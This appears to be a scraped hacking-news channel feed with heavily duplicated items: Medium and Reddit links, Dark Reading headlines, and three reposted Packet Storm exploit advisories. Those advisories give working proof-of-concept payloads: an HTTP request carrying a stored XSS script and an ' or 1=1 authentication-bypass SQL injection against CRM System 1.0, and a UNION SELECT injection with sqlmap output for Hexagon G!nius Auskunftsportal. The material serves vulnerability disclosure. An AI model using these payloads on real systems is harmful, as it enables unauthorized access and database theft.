Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Vim/Neovim Plugins for Writing
https://cdn-images-1.medium.com/max/1886/1*zxx_dnjDGb7KWlzm3FnSTw.png
Vim/Neovim plugins for writers.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Vim/Neovim Plugins for Writing
https://cdn-images-1.medium.com/max/1886/1*zxx_dnjDGb7KWlzm3FnSTw.png
Vim/Neovim plugins for writers.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Vim/Neovim Plugins for Writing
Vim/Neovim plugins for writers.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Introdução ao OWASP Top 10
https://cdn-images-1.medium.com/max/1200/1*dlxdby-TVCMYIpv0OiFiwQ.png
Quando falamos sobre segurança de aplicativos, é quase inevitável falar sobre o Top Ten da OWASP.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Introdução ao OWASP Top 10
https://cdn-images-1.medium.com/max/1200/1*dlxdby-TVCMYIpv0OiFiwQ.png
Quando falamos sobre segurança de aplicativos, é quase inevitável falar sobre o Top Ten da OWASP.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Introdução ao OWASP Top 10
Quando falamos sobre segurança de aplicativos, é quase inevitável falar sobre o Top Ten da OWASP. Para aqueles que não estão familiarizados…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Las 12 principales fallas de seguridad que los piratas informáticos espías rusos están explotando…
https://cdn-images-1.medium.com/max/915/0*DR-f1RpKU8wIeURa
PUBLICADO EN 11 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Las 12 principales fallas de seguridad que los piratas informáticos espías rusos están explotando…
https://cdn-images-1.medium.com/max/915/0*DR-f1RpKU8wIeURa
PUBLICADO EN 11 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Las 12 principales fallas de seguridad que los piratas informáticos espías rusos están explotando en la naturaleza.
PUBLICADO EN 11 MAYO, 2021 POR EHACKING
My First Bug Bounty Reward
https://www.reddit.com/r/redteamsec/comments/na4un0/my_first_bug_bounty_reward/
submitted by /u/banginpadr (https://www.reddit.com/user/banginpadr)
[link] (https://infosecwriteups.com/my-first-bug-bounty-reward-7abbdd9ab037) [comments] (https://www.reddit.com/r/redteamsec/comments/na4un0/my_first_bug_bounty_reward/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/na4un0/my_first_bug_bounty_reward/
submitted by /u/banginpadr (https://www.reddit.com/user/banginpadr)
[link] (https://infosecwriteups.com/my-first-bug-bounty-reward-7abbdd9ab037) [comments] (https://www.reddit.com/r/redteamsec/comments/na4un0/my_first_bug_bounty_reward/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
My First Bug Bounty Reward
Posted in r/redteamsec by u/banginpadr • 2 points and 2 comments
Deep Web
Can anyone recommend any deep web sites that hosts certificate courses from reputable universities for free? Or any edtech sites on the deep web. Thanks.
submitted by /u/AlexVentures
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Can anyone recommend any deep web sites that hosts certificate courses from reputable universities for free? Or any edtech sites on the deep web. Thanks.
submitted by /u/AlexVentures
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Can anyone recommend any deep web sites that hosts certificate...
Posted in r/deepweb by u/AlexVentures • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Application Attacks Spike as Criminals Target Remote Workers
Application-specific and Web application attacks made up 67% of all attacks in 2020 as criminal strategies shifted in the pandemic.
___________________________
@hacking_Attack
@Hacking_Video
Application Attacks Spike as Criminals Target Remote Workers
Application-specific and Web application attacks made up 67% of all attacks in 2020 as criminal strategies shifted in the pandemic.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Application Attacks Spike as Criminals Target Remote Workers
Application-specific and Web application attacks made up 67% of all attacks in 2020 as criminal strategies shifted in the pandemic.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Adobe Issues Patch for Acrobat Zero-Day
The vulnerability is being exploited in limited attacks against Adobe Reader users on Windows.
___________________________
@hacking_Attack
@Hacking_Video
Adobe Issues Patch for Acrobat Zero-Day
The vulnerability is being exploited in limited attacks against Adobe Reader users on Windows.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Adobe Issues Patch for Acrobat Zero-Day
The vulnerability is being exploited in limited attacks against Adobe Reader users on Windows.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Pipeline Hackers Say They are Apolitical, Will Choose Targets More Carefully Next Time
https://external-preview.redd.it/9e9qLI-AAwdQgU7ZU-6iHCza_Sp_ezBB18HZDh60A3k.jpg?width=640&crop=smart&auto=webp&s=469a4767b86c07cdac73362c61d5daace8455ac1 submitted by /u/standardworks
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Pipeline Hackers Say They are Apolitical, Will Choose Targets More Carefully Next Time
https://external-preview.redd.it/9e9qLI-AAwdQgU7ZU-6iHCza_Sp_ezBB18HZDh60A3k.jpg?width=640&crop=smart&auto=webp&s=469a4767b86c07cdac73362c61d5daace8455ac1 submitted by /u/standardworks
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Pipeline Hackers Say They are Apolitical, Will Choose Targets More...
Posted in r/hacking by u/standardworks • 1 point and 0 comments
hacking: security in practice
Virtual Machines
Will using a virtual machine on a flash drived linux OS (rufus) everyday kill my laptop. It's not like a super expensive laptop, but it's also not what you'd necessarily consider cheap.
I'm practicing stuff for IT but I also wanna use virtual machine for more casual stuff(youtube) just to experiment with ways to get privacy and security.
submitted by /u/UnspecifiedCow
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Virtual Machines
Will using a virtual machine on a flash drived linux OS (rufus) everyday kill my laptop. It's not like a super expensive laptop, but it's also not what you'd necessarily consider cheap.
I'm practicing stuff for IT but I also wanna use virtual machine for more casual stuff(youtube) just to experiment with ways to get privacy and security.
submitted by /u/UnspecifiedCow
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Virtual Machines
Will using a virtual machine on a flash drived linux OS (rufus) everyday kill my laptop. It's not like a super expensive laptop, but it's also not...
hacking: security in practice
Hacked
Can someone help me? A hacker got in through my IG and now I can’t setup two factor auth with IG and I don’t think my Reddit posts are being posted??? Can someone reply that they see this?
submitted by /u/npiluv
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacked
Can someone help me? A hacker got in through my IG and now I can’t setup two factor auth with IG and I don’t think my Reddit posts are being posted??? Can someone reply that they see this?
submitted by /u/npiluv
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacked
Can someone help me? A hacker got in through my IG and now I can’t setup two gator auth with IG and I don’t think my Reddit posts are being...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Customer Relationship Management (CRM) System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-cErR-NKa5pU/WWlvUH06dSI/AAAAAAAAINw/w0uVuk51vEgh40coJSJAKFsc2nT9tBwYgCLcBGAs/s1600/h44.png
Customer Relationship Management (CRM) System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Customer Relationship Management (CRM) System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-cErR-NKa5pU/WWlvUH06dSI/AAAAAAAAINw/w0uVuk51vEgh40coJSJAKFsc2nT9tBwYgCLcBGAs/s1600/h44.png
Customer Relationship Management (CRM) System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
cf0d47675e4753962da5db34f3ef7c4dDownload
# Exploit Title: Customer Relationship Management (CRM) System 1.0 - Stored XSS
# Date: 11/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14794&title=Customer+Relationship+Management+%28CRM%29+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: # Tested on: windows 10 (build 19041) + xampp v3.2.4
POST /crm/classes/Master.php?f=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/customer/?page=ticket&view=create_ticket
Cookie: PHPSESSID=fspsjsh0e5tiq6hdnlmb9aigo2
id=&title=%3Cscript%3Econfirm(%60Stored+XSS%60)%3C%2Fscript%3E&service_id=4&description=%3Cp%3ETest%3Cbr%3E%3C%2Fp%3E
Payload:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Customer Relationship Management (CRM) System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Customer Relationship Management (CRM) System 1.0 SQL Injection
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
Customer Relationship Management (CRM) System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Customer Relationship Management (CRM) System 1.0 SQL Injection
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
Customer Relationship Management (CRM) System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
df2f1ca3c4905b571716bcf98058482cDownload
# Exploit Title: Customer Relationship Management (CRM) System 1.0 - Admin Bypass (SQLi)
# Date: 11/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14794&title=Customer+Relationship+Management+%28CRM%29+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: # Tested on: windows 10 (build 19041) + xampp v3.2.4
POST /crm/classes/Login.php?f=clogin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/customer/login.php
Cookie: PHPSESSID=fspsjsh0e5tiq6hdnlmb9aigo2
username='+or+1%3D1--+-&password='+or+1%3D1--+-
Or goto the login page and enter the below payload
Payload:
' or 1=1-- -
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Customer Relationship Management (CRM) System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Hexagon G!nius Auskunftsportal SQL Injection
https://2.bp.blogspot.com/-Nz8u9CyJbsU/WWlveW9d4WI/AAAAAAAAIPw/tdSVtwWBcYIHlgRN6nbdKVd_fE-UdNKsACLcBGAs/s1600/h80.png
Hexagon G!nius Auskunftsportal versions prior to 5.0.0.0 suffer from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Hexagon G!nius Auskunftsportal SQL Injection
https://2.bp.blogspot.com/-Nz8u9CyJbsU/WWlveW9d4WI/AAAAAAAAIPw/tdSVtwWBcYIHlgRN6nbdKVd_fE-UdNKsACLcBGAs/s1600/h80.png
Hexagon G!nius Auskunftsportal versions prior to 5.0.0.0 suffer from a remote SQL injection vulnerability.
MD5 |
d6dd0935d69c6151673cc0768d99190aDownload
CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
[Additional Information]
PoC Payload: id=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||
CHR(107)||CHR(112)||CHR(122)||CHR(113)||CHR(107)||CHR(71)||CHR(98)||CHR(88)||CHR(104)||CHR(102)||CHR(99)||
CHR(67)||CHR(113)||CHR(109)||CHR(69)||CHR(110)||CHR(67)||CHR(76)||CHR(103)||CHR(84)||CHR(83)||CHR(109)||
CHR(121)||CHR(84)||CHR(73)||CHR(116)||CHR(79)||CHR(103)||CHR(87)||CHR(84)||CHR(120)||CHR(119)||CHR(75)||
CHR(76)||CHR(114)||CHR(120)||CHR(103)||CHR(85)||CHR(87)||CHR(112)||CHR(111)||CHR(70)||CHR(108)||CHR(73)||
CHR(113)||CHR(112)||CHR(113)||CHR(120)||CHR(113),NULL FROM DUAL-- LShX
Result:
====
back-end DBMS: Oracle
banner: 'Oracle Database 19c Standard Edition 2 Release 19.0.0.0.0 - Production'
current user: 'IPA_ADMIN'
current database (equivalent to schema on Oracle): 'IPA_ADMIN'
current user is DBA: False
database management system users [18]:
====
Impact:
Complete compromise of the database's data integrity.
Discovery:
1. Discovered manually
2. Exploited via sqlmap
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
Hexagon AG
------------------------------------------
[Affected Product Code Base]
G!nius Auskunftsportal - 5.0.0.0 (fixed)
------------------------------------------
[Affected Component]
DownloadPublicFile component
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
The web application has a function ("DownloadPublicFile") which facilitates downloads.
The "id" parameter (used to specify which file is to be downloaded) is vulnerable to SQL injection.
This SQL injection attack surface allows the Oracle database backend to be accessed and read without authentication by using a "UNION SELECT" payload.
Accessing the following URL will trigger an Oracle error message:
https://[affected site root]/GiPWorkflow/Service/DownloadPublicFile?id=DS'
The apostrophe at the end (Unicode U+0027) interrupts the application's hard-coded SQL query.
At this point a "UNION SELECT" payload can be used to access any data within the database.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
A patch has been developed, released and installed to all known instances of the vulnerability a full six months prior to public disclosure.
------------------------------------------
[Discoverer]
Marcel Keiffenheim
------------------------------------------
[Reference]
https://www.hexagonsafetyinfrastructure.com/products/utilities-and-communications-products/advanced-utility-gis/hexagon-ginius
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Hexagon G!nius Auskunftsportal SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.